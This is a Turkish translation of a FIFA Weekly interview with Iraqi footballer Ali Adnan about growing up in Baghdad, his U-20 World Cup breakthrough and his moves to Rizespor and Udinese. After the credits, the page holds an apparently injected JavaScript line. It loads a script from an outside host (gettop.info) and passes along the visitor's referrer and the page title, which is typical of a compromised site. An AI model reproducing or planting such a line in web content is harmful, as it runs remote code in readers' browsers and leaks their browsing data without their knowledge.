Ali Adnan Röportajı | “Kariyerimin Dönüm Noktası Türkiye’de Düzenlenen U-20 Dünya Kupasıydı”

rizesporlu-ali-adnan-udinese-de-7364468_x_4634_o

Onu Avrupa’nın üst seviye liglerinden birinde oynayan ilk Irak’lı futbolcu yapan Udinese transferi sonrası Ali Adnan Kadhim Al-Tameemi ülkesinin spor tarihine yeni bir sayfa ekledi.

Savaşın mahvettiği Bağdatta büyümek nasıl bir şeydi?

Tahmin edebileceğiniz gibi her gün bir hayatta kalma mücadelesi vardı. Ama yine de biz çocuklar olarak eğlenmenin yollarını arıyorduk. Arkadaşlarım ve ben kafamızı dağıtmak için sokakta futbol oynuyor ya da bombaların izin verdiği müddetçe televizyondan dünyanın en iyi takımlarını izliyorduk. Bizim için eğlenmenin tek yolu futboldu.

Aile içinde futbol ne kadar önemli?

İçerisinde yedi çocuk barındıran ailemizde futbol her zaman önemli bir rol oynadı. Babam Bağdatta bir takımda oynamıştı hatta amcam Ali Kadhim 1980’de milli takıma bile seçilmişti. Çocukken, inanılmaz kuvvetli sol ayağı olan Brezilyalı Roberto Carlos hayranıydım.

Spora nasıl başladın?

İlk olarak Ammo Baba Okulu akademisinde ve daha sonra 2010’da Bağdat Futbol Kulübü genç takımına girmeden önce Al Qawa Jawiya’da oynadım. A takıma yükselmeden önce 2012 yılında Bahreyn’e karşı milli maçta forma giydim. Henüz 18 yaşında bile değilken ülkemin beyaz-yeşil formasını giydim. Tarif edilemez bir histi.

Avrupaya gelişin nasıl oldu?

Kariyerimin dönüm noktası 2013 yılında Türkiye’de düzenlenen, dördüncü bitirdiğimiz U-20 Dünya Kupasıydı. Scoutlar beni orada keşfetti ve ardından Türkiyenin en üst düzey liginde oynayan Çaykur Rizespor’a getirdi.

riz1.20131022001143
Türkiye’de geçen iki yılın nasıldı?

İlk sezon benim açımdan çok başarılı ve mükemmel geçerken ikinci sezonda antrenörle bir iki fikir ayrılıklarımız oldu. Ancak beni beğenenler bundan dolayı benden vazgeçmedi ve ne pahasına olursa olsun beni istedi.

Udinese’den mi bahsediyorsun?

Elbette. Bu kalibrede bir kulübün benimle ilgilenmesine şaşırmıştım ama sonradan öğrendim ki bu onların kulüp felsefesine uyuyormuş. Zaten dünyanın bir çok yerinden futbolcular keşfedip onları büyük kulüplere satma anlamında bir rekora sahiplermiş ve umarım aynı şey benim için de gerçekleşir.

Udine şehri ve yeni kulübündekilerle ile ilgili ne düşünüyorsun?

Çokça hissettiğim, anlayışla karşılanabilir dil engeline rağmen ailemi de yakında buraya getirmek istiyorum. Herkesle iyi geçiniyorum ve kadroda dünyanın birçok yerinden oyuncuların olması entegrasyonu kolaylaştırıyor. Özellikle Fransız forvetimiz Cyril Thereau ve Portekizli orta saha oyuncumuz Bruno Fernandes ile çok iyi anlaşıyorum.

Serie A’da ilk maçını ve genel olarak Avrupa futbolunu nasıl buldun?

Son şampiyon Juventus’u deplasmanda yendiğimiz düşünülürse, bundan daha iyisi olamazdı. Maçtan önce tamamen maçtaki görevime konsantre olmuş durumdaydım ve ancak maçtan sonra anladım ki bu seviyede kendime yer bulabilirim. Bu başarıyı ilk maçımı bekleyen tüm vatandaşlarımla paylaşmak istiyorum.

fft64_mf1639947

Tekrar Bağdat ve Irak’a döndüğünde tam anlamıyla bir karşılama olur.

Birkaç gündür kardeşlerim ve arkadaşlarım bunu ne kadar istediklerinden bahsediyorlar ve eve gitmeyi,bunu bizzat yaşamayı çok zor bekliyorum. Ülkem için bir elçi gibi hizmet ettiğimi biliyorum ama aynı zamanda genç oyuncular için bir rol modelim. Bu büyük bir onur ve beni çok gururlandırıyor.

Iraklı futbolseverler artık milli takımdan 2018’de Rusya’da düzenlenecek Dünya Kupası’na katılmayı bekliyor.

Son olarak AFC Asya Kupası’ndaki dördüncülükten sonra Dünya Kupası şansımızı sonuna kadar kovalayacağız ve inanıyorum ki bunu başaracağız. Irak daha önce sadece 1986’da katılmış ve artık tekrar orda olmanın zamanı geldi. Aynı zamanda bunu yıllardır savaş ve şiddetle uğraşmak zorunda kalan vatandaşlarımıza borçluyuz.

Henüz 22 yaşında bile olmamana rağmen birçok tecrübeye sahipsin. Futbolda daha başarmak istediğin şeyler var mı?

Udinese gibi bir takımda oynamaktan inanılmaz mutluyum ama amacım bir gün Avrupanın en üst düzey kulüplerinden birinde oynamak ve kupalar kazanmak.  Aynı zamanda kariyerim boyunca ülkem için ve benim yolumu izlemek isteyen her Iraklı genç oyuncu için büyük başarı olacak ödüller de kazanabilmeyi umuyorum.
                                                                                                          

Kaynak : Fifa Weekly                                                                                             

Röportaj : Franco Nicolussi                                                                                             

Çeviri : Serhat Bora

 s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

adet yorum. Siz de yorumunuzu aşağı yazabilirsiniz.

Yazar: Futbol Akademi

info@futbolakademi.net

Paylaş